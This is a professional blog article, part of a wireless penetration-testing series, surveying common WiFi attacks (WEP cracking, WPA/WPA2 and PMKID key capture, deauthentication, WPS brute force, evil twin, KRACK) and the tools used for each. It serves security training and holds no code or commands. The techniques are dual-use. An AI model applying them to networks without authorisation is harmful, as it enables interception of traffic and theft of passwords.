In the previous article of this series, “Wireless Pentesting Part 2 – Building a WiFi Hacking Rig”, we discussed building a WiFi hacking rig. We covered the hardware, operating systems, and software requirements for setting up your own wireless pentesting rig. In this third part of the series, we are going to introduce common wireless attacks and the tools you use to perform them which will prepare you for the fourth and final part of the series, where we will take look at how to conduct a wireless pentest.
Addendum: Pivoting to Parrot
Before we get into wireless attacks, I wanted to provide an update and share some lessons learned from a wireless pentest I conducted at work recently. I haven’t done much with wireless pentesting tools, since the latest version of Kali Linux was released. Some of the wireless tools weren’t installing correctly and the dependencies for some tools weren’t installing correctly. Part of the issue is due to moving away from Python 2.7 due to deprecation and not being updated to Python 3.X. My newest Alf USB WiFi adapter, the AWUS036ACH, even with driver updates was not working on the latest version of Kali Linux.
One solution would have been to use older versions of Kali Linux, but I decided to try Parrot Security, the cyber security-focused version of the Parrot OS distribution of Linux. I was pleasantly surprised. Most of all the latest and greatest wireless pentesting tools were installed and ran properly. This included hcxtools and hcxdumptool required by Wifite and some other tools. Hcxdumptool is a good tool for password cracking and used with Hashcat. I discovered it while setting up my wireless pentesting rig that the SANS Institute uses for Pandas USB WiFi adapters in the SANS Wireless Pentest course. Most adapters outside of Alfa don’t require any special setup. Due to my Alfa AWUS036ACH not working on Kali or Parrot OS, I went with an older Alfa and an Ubiquiti SR-71 adapter from my consulting days. I had to use both to cover 2.4 GHz and 5 GHz WiFi spectrums.
I wanted to also mention some tools that I did not previously list in this article series. During my pentesting and wireless rig setup I discovered the need for Reaver and hcxdumptool for some non-automated attacks. Airgeddon, an automated tool very similar to Wifite, and Bettercap for MiTM attacks and wireless pentesting (also used for Bluetooth pentesting) are good tools for wireless pentesting.. While I still like Kali Linux, Parrot OS will be my go-to OS for wireless pentesting.
Wireless Attack Surfaces
The two attack surfaces used to exploit wireless networks are clients and hotspots. The common professional term for hotspots is Access Points or APs for short. This is the proper term,, and it is important to use the right terminology to convey professionalism.
Clients on wireless networks can be computers, servers, mobile devices, and IoT (Internet of Things) devices. Mobile and IoT devices have become more common and can be targets for exploitation. Traffic can be intercepted leveraging Man in The Middle (MiTM) techniques allowing the attacker, or in our case the pentester, to capture intercepted wireless communications. Passwords and sensitive information can be collected using a MiTM attack.
Wireless APs are most commonly attacked over the network, but, if APs are physically accessible, an attacker could connect using an ethernet cable. This could allow attackers to bypass authentication. Commercial wireless networks typically use APs connected to wireless controllers. Wireless network controllers are used to centralize management of multiple light weight APs. The lightweight APs do not have all the functionality of a home or SOHO (Small Office Home Office) wireless router. Wireless controllers could also be physically exploited if not located in a secure location. Physical attacks are easy if you have access to the wireless infrastructure and APs, but that is simple to figure out and beyond the scope of this series.
WEP Encryption Attacks exploit the Wired Equivalent Privacy (WEP) encryption protocol, where the attacker captures initialization vectors (IVs) from wireless network traffic and cracks the password.
WPA/WPA2 Encryption Attacks are exploited by capturing pre-shared keys (PSKs) and cracking them. Tools that are used in attacking WPA/WPA2 include the Aircrack-ng tool suite (Airodump-ng, Aireplay-ng, and Aircrack-ng), Wifite, and Airgeddon.
Deauthentication Attacks or Deauth Attacks, as they are most commonly referred to, forces wireless clients off of a network. This is used to get clients to reconnect to fake WiFi APs during evil twin attacks or to capture network connection handshakes to crack AP keys.
Wireless Sniffing and Eavesdropping is performed using a network sniffer such as Wireshark, TShark, TCPdump, as well as man-in-the-middle (MiTM) tools like Ettercap or Bettercap.
WPS Attack exploits WPS (Wi-Fi Protected Setup) which uses a PIN as a shared secret to authenticate an access point and a client and provide connection information such as WEP and WPA passwords and keys. In the external registrar exchange method, a client needs to provide the correct PIN to the access point. An attacking client can try to guess the correct PIN. A design vulnerability reduces the effective PIN space sufficiently to allow practical brute force attacks. Freely available attack tools can recover a WPS PIN in 4-10 hours. The WPS Pixie Dust attack can be used to exploit WPS and can be exploited using the Wifite or Reaver tools.
Evil Twin is a fraudulent Wi-Fi access point that appears to be legitimate but is set up to eavesdrop on wireless communications. The evil twin is the wireless LAN equivalent of the phishing attack. This type of attack may be used to steal the passwords of unsuspecting users, either by monitoring their connections or by phishing. This attack involves setting up a fraudulent web site and luring people there. WiFi Pumpkin or HostAPD can be used to perform Evil Twin attacks.
PMKID (Pairwise Master Key Identifier) Attacks are performed against WPA/WPA2 where the attacker attempts intercept and Pre-shared Key (PSK) login passwords, allowing them to hack into your Wi-Fi network and eavesdrop on the Internet communications. This can be exploited using Airodump and hcxdumptool.
Key Reinstallation Attacks (KRACK) are a form of replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. Scripts to exploit this vulnerability can be found on https://www.krackattacks.com/ along with more details on the vulnerability.
So I have my WiFi hacking rig and my attack arsenal. What’s next?
We covered WiFi attacks which can be leveraged during the exploit phase of the pentest. Most of the attacks can be done in a more manual approach as well as an automated approach using Wifite, Airgeddon, Reaver, or Fern WiFi Cracker. It is good to learn both the manual and automated attack techniques.
To get some experience before pentesting your first WiFi network, it is a good idea to build a lab. You can acquire a used or inexpensive WiFi router, configure it to use WEP and then change the configuration to use WPA, WPA2, and WPS. Configure the passwords to something easy to get the hang of hacking. If you have problems hacking the router, then you can add your password to the file to see what it looks like when you succeed.
By the end of this four-part series, we’ll have covered everything you need to know to complete a basic wireless pentest and not just do some hacker-like things. We’ve covered an overview of wireless pentesting in the first article, building a wireless pentesting rig in the second and now you have been introduced to a number of different attacks. In Part 4 we will put all of the pieces together and go over the official process of performing a wireless pentest.
Until next time keep on pwning! But please have permission.
Phillip Wylie is a Principal InfoSec Engineer on the Assessment Services Penetration Testing Team in the financial sector. Phillip is also an Adjunct Instructor at Richland College teaching Ethical Hacking and System Defense, a Bugcrowd Ambassador and the founder of The Pwn School Project. Phillip has over 21 years of experience in InfoSec and IT and has performed pentests on networks, wireless networks, applications including thick client, web application and mobile. Phillip has a passion for sharing, mentoring and educating. This passion was his motivation to start teaching and founding The Pwn School Project, a free monthly educational meetup with a focus on hacking. Phillip holds the following certifications; CISSP, NSA-IAM, OSCP, GWAPT. Follow him @PhillipWylieTags: ethical hacking hacking highlight pentest wifi wireless wylie